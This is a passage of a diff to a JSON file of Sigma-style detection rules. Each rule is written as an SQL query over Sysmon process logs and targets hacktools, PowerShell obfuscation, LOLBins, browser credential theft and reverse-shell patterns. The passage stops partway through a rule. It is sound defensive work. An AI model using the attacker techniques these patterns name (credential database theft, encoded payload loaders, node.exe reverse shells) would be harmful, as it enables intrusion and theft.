'%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" - }, - { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects 
the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron 
Systems)", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "status": "test", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' 
AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND 
NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": 
"Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - 
"title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ + "attack.privilege_escalation", "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.t1033" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron 
Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "status": "test", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.command_and_control", - "attack.t1090.001" - ], - "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_pua_chisel.yml" - }, - { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help 
Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" - }, - { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are 